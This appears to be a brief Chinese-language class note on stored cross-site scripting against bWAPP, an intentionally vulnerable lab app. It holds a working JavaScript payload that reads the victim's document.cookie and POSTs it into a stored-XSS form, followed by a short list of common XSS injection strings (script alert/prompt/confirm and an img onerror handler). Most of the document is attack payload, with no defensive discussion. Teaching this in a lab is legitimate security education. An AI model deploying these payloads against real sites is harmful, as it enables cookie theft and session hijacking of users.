javascript 制作存储型xss发送数据包
<script>
xhr = new XMLHttpRequest();
xhr.open("post", "/bWAPP/xss_stored_1.php", true); //请求类型,url
xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); //头部字段
xhr.send("entry=" + document.cookie + "&blog=submit&entry_add="); //包体内容
</script>
常用xss函数
1 <script>alert("ethan")</script>
2 <script>prompt("ethan")</script>
3 <script>confirm("ethan")</script>
4 <img src=xxx onerror=alert("ethan")>
5 <script>var r=confirm('你们有在好好听课吗?'); if(r==true) {alert('你选择了确定');} else{alert('你选择了取消');}</script>
6